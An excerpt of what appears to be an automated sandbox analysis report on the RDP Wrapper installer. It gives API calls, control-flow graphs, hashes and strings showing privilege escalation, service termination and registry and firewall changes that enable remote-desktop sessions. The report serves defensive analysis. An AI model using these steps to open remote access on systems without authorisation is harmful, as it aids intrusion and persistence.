                                                                                                                                  • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                  • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                                                                  • API String ID: 1401577899-1200187420
                                                                                                                                  • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                                                  • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                                                                  • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                                                  • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoadResource$FindFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3272429154-0
                                                                                                                                  • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                                                  • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                                                                  • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                                                  • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                                                                  APIs
                                                                                                                                  • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                                                                    • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                                    • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3216391948-0
                                                                                                                                  • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                                                  • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                                                                  • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                                                  • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                                                  • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                                                                                                  • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                                                  • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                  • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                                                  • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                                                                                                  • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                                                  • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 44373c-44373f 1 443744-443749 0->1 1->1 2 44374b-4437d0 call 40a2b0 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404504 1->2 31 443876-443965 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 2->31 32 4437d6-4437f0 call 404564 call 4072a4 2->32 105 443f97-443fb1 call 406be8 31->105 42 4437f6-443810 call 404564 call 4072a4 32->42 43 44396a-443984 call 404564 call 4072a4 32->43 42->43 59 443816-443830 call 404564 call 4072a4 42->59 56 443986-4439a7 call 43cea4 call 407450 call 404cdc call 4042f8 43->56 57 4439ac-4439ba call 414708 43->57 56->105 68 4439bc-4439e8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 57->68 69 4439ed-4439f4 call 43a644 57->69 59->43 79 443836-443850 call 404564 call 4072a4 59->79 68->105 83 4439f6-443a0c call 407450 call 404cdc call 4042f8 69->83 84 443a11-443a30 call 43a7bc call 404564 call 4072a4 69->84 79->43 111 443856-443870 call 404564 call 4072a4 79->111 83->105 127 443cc4-443cde call 404564 call 4072a4 84->127 128 443a36-443a3d 84->128 111->31 111->43 150 443ce4-443ceb 127->150 151 443e6b-443e85 call 404564 call 4072a4 127->151 133 443a5f-443b13 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 128->133 134 443a3f-443a5a call 407450 call 404cdc call 4042f8 call 40632c 128->134 354 443b15-443b24 call 406bf0 133->354 355 443b26-443b30 call 406bf0 133->355 134->133 156 443d0d-443d2a call 407450 call 404cdc call 4042f8 150->156 157 443ced-443d08 call 407450 call 404cdc call 4042f8 call 40632c 150->157 177 443e87-443e8e 151->177 178 443ecb-443ee5 call 404564 call 4072a4 151->178 201 443d31-443dac call 43b7d4 call 407450 call 404cdc call 4042f8 call 43c9b4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 407450 call 404cdc call 4042f8 call 43d938 call 40816c 156->201 202 443d2c call 43a688 156->202 157->156 184 443eb0-443ec6 call 407450 call 404cdc call 4042f8 call 43f7a4 177->184 185 443e90-443eab call 407450 call 404cdc call 4042f8 call 40632c 177->185 178->105 215 443eeb-443f46 call 407450 call 404cdc call 4042f8 call 43b7d4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 178->215 184->178 185->184 343 443dd3-443e0b Sleep call 43b58c Sleep call 404564 call 4072a4 201->343 344 443dae-443dbd call 40816c 201->344 202->201 303 443f6d-443f92 Sleep call 43b58c call 407450 call 404cdc call 4042f8 215->303 304 443f48-443f57 call 40816c 215->304 303->105 304->303 318 443f59-443f5a 304->318 323 443f5c-443f6b call 43b58c 318->323 323->303 366 443e47-443e4e 343->366 367 443e0d-443e42 call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 343->367 344->343 353 443dbf-443dc0 344->353 357 443dc2-443dd1 call 43b58c 353->357 365 443b35-443b3c 354->365 355->365 357->343 368 443b43-443b7d call 43de78 call 43b7d4 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 365->368 369 443b3e call 43a688 365->369 370 443e55-443e66 call 407450 call 404cdc call 4042f8 366->370 371 443e50 call 43a724 366->371 367->366 408 443b9f 368->408 409 443b7f-443b99 call 404564 call 4072a4 368->409 369->368 370->151 371->370 410 443ba1-443c21 call 43d0f8 call 407450 call 404cdc call 4042f8 call 43c598 call 407450 call 404cdc call 4042f8 call 43e7dc call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 408->410 409->408 418 443b9b-443b9d 409->418 446 443c23-443c32 call 40816c 410->446 447 443c48-443c9b Sleep call 43b58c Sleep call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 410->447 418->410 446->447 452 443c34-443c35 446->452 471 443ca0-443cbd call 407450 call 404cdc call 4042f8 447->471 454 443c37-443c46 call 43b58c 452->454 454->447 471->127 478 443cbf call 43a724 471->478 478->127
                                                                                                                                  Strings
                                                                                                                                  • $sD, xrefs: 00443761
                                                                                                                                  • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                                                                  • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                                                                  • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                                                                  • do not use the software., xrefs: 00443ACF
                                                                                                                                  • -w get latest update for INI file, xrefs: 0044390F
                                                                                                                                  • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                                                                  • [*] Removing files..., xrefs: 00443D87
                                                                                                                                  • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                                                                  • [+] Done., xrefs: 00443F83
                                                                                                                                  • -l display the license agreement, xrefs: 004438B7
                                                                                                                                  • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                                                                  • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                                                                  • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                                                                  • [*] Uninstalling..., xrefs: 00443D0F
                                                                                                                                  • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                                                                  • LpD, xrefs: 0044374F
                                                                                                                                  • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                                                                  • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                                                                  • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                                                                  • [+] Successfully installed., xrefs: 00443CA2
                                                                                                                                  • [*] Installing..., xrefs: 00443AE5
                                                                                                                                  • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                                                                  • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                                                                  • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                                                                  • [*] Checking for updates..., xrefs: 00443EB2
                                                                                                                                  • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                                                                  • [*] Notice to user:, xrefs: 00443A61
                                                                                                                                  • Installer v2.5, xrefs: 0044378D
                                                                                                                                  • USAGE:, xrefs: 00443878
                                                                                                                                  • [*] Configuring service library..., xrefs: 00443BAD
                                                                                                                                  • -u uninstall wrapper, xrefs: 00443925
                                                                                                                                  • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                                                                  • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                                                                  • [*] Restarting..., xrefs: 00443EED
                                                                                                                                  • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                                                                  • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                                                                  • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                                                                  • [*] Extracting files..., xrefs: 00443B4F
                                                                                                                                  • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                                                                  • -r force restart Terminal Services, xrefs: 00443951
                                                                                                                                  • license, xrefs: 00443989
                                                                                                                                  • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                                                                  • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                                                                  • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                                                                  • [*] Resetting service library..., xrefs: 00443D38
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                                                                  • API String ID: 0-551293883
                                                                                                                                  • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                                                  • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                                                                                                  • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                                                  • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 480 43e864-43e877 481 43e879-43e88d call 4387ec 480->481 482 43e88f-43e89b call 4387a8 480->482 487 43e89e-43e8bc call 438890 call 4389d8 481->487 482->487 492 43e8fa-43e95f call 4396b8 call 438860 487->492 493 43e8be-43e8f5 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 487->493 504 43ed53-43ed61 call 40518c 492->504 505 43e965-43e976 call 4389d8 492->505 493->492 513 43e9b4-43ea21 call 4396b8 call 438860 call 4389d8 505->513 514 43e978-43e9af GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 505->514 533 43ea23-43ea5a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 513->533 534 43ea5f-43eac3 call 4396b8 call 438860 call 439d1c 513->534 514->513 533->534 550 43eac8-43eaca 534->550 550->504 552 43ead0-43eae1 call 4389d8 550->552 558 43eae3-43eb1a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 552->558 559 43eb1f-43eb38 call 438860 call 4389d8 552->559 558->559 569 43eb76-43ebf8 call 4392f0 call 439674 call 438860 call 4389d8 559->569 570 43eb3a-43eb71 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 559->570 596 43ec36-43ecb8 call 4392f0 call 439674 call 438860 call 4389d8 569->596 597 43ebfa-43ec31 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 569->597 570->569 618 43ecf6-43ed4e call 439674 call 438860 596->618 619 43ecba-43ecf1 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 596->619 597->596 618->504 619->618
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                                                                  • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                                                                  • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                                                                  • API String ID: 1452528299-1114397459
                                                                                                                                  • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                                                  • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                                                                                                  • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                                                  • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1050 408f6c-408f95 call 406bd8 1053 408f97-408faa GetModuleFileNameW 1050->1053 1054 408fac-408fc1 call 406c7c lstrcpynW 1050->1054 1055 408fc6-408fce 1053->1055 1054->1055 1058 408fd4-408ff5 RegOpenKeyExW 1055->1058 1059 40913b-409150 call 406be0 1055->1059 1061 409055-40908f call 408d70 RegQueryValueExW 1058->1061 1062 408ff7-409013 RegOpenKeyExW 1058->1062 1069 409091-4090c2 call 4041b0 RegQueryValueExW call 406d9c 1061->1069 1070 4090c4-4090de RegQueryValueExW 1061->1070 1062->1061 1063 409015-409031 RegOpenKeyExW 1062->1063 1063->1061 1066 409033-40904f RegOpenKeyExW 1063->1066 1066->1059 1066->1061 1072 40910f-409120 1069->1072 1071 4090e0-40910a call 4041b0 RegQueryValueExW call 406d9c 1070->1071 1070->1072 1071->1072 1077 409122-409125 call 4041cc 1072->1077 1078 40912a-409133 RegCloseKey 1072->1078 1077->1078
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
